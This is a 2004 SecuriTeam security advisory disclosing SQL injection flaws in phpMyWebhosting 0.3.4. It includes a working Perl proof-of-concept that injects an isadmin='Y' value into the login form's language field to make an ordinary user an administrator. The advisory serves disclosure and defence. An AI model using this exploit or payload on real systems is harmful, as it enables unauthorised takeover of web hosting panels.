[UNIX] phpMyWebhosting SQL Injection Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 08/16/04

  • Next message: SecuriTeam: "[TOOL] WAL - Web Audit Library"
    To: list@securiteam.com
    Date: 16 Aug 2004 09:56:58 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      phpMyWebhosting SQL Injection Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://pmwhwiki.cs-ol.de/tiki-index.php> phpMyWebhosting, "allows you to
    lease out parts of your web server and mail server without needing to give
    anyone console access".

    Multiple SQL injection has been found in phpMyWebhosting that allow
    attackers to gain elevated privileges as well as enter to the product's
    management system without knowing the administrative password.

    DETAILS

    Vulnerable Systems:
     * phpMyWebhosting version 0.3.4

    phpMyWebhosting takes no care to verifying incoming user input for
    arbitrary SQL statements. This means that if you have disabled
    magic_quotes_gpc in your PHP settings, a remote attacker can cause SQL
    injection vulnerability in phpMyWebhosting.

    Exploit:
    #!/usr/bin/perl
    # Exploit code by Noam Rathaus of Beyond Security Ltd.
    # The following exploit code will use a valid username and password
    combination, to cause an SQL injection.
    # Using the SQL injection, the Perl script elevates the privileges of the
    user provided to administrative.

    use IO::Socket;
    use strict;

    my $Host = shift;
    my $Path = shift;
    my $Username = shift;
    my $Password = shift;

    if ($Host eq "" || $Path eq "" || $Username eq "" || $Password eq "")
    {
    print "You must run the script with the following syntax:\n";
    print $0." hostname path username password\n";
    exit(0);
    }

    my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $Host,
    PeerPort => "80" );

    unless ($remote) { die "cannot connect to http daemon on $Host" }

    print "connected\n";

    $remote->autoflush(1);

    my $http = "POST /$Path/index.php HTTP/1.1
    Host: $Host
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506
    Firefox/0.8
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: ";

    my $content =
    "PHP_AUTH_USER=$Username&password=$Password&language=english',isadmin='Y&login=Login";

    $http .= length($content)."

    $content";

    print "HTTP: [$http]\n";
    print $remote $http;
    sleep(1);
    print "Sent\n";

    while ()
    {
    print $_;
    }
    print "\n";

    close $remote;

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:matias@neiff.com.ar> Matias
    Neiff.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[TOOL] WAL - Web Audit Library"

    Relevant Pages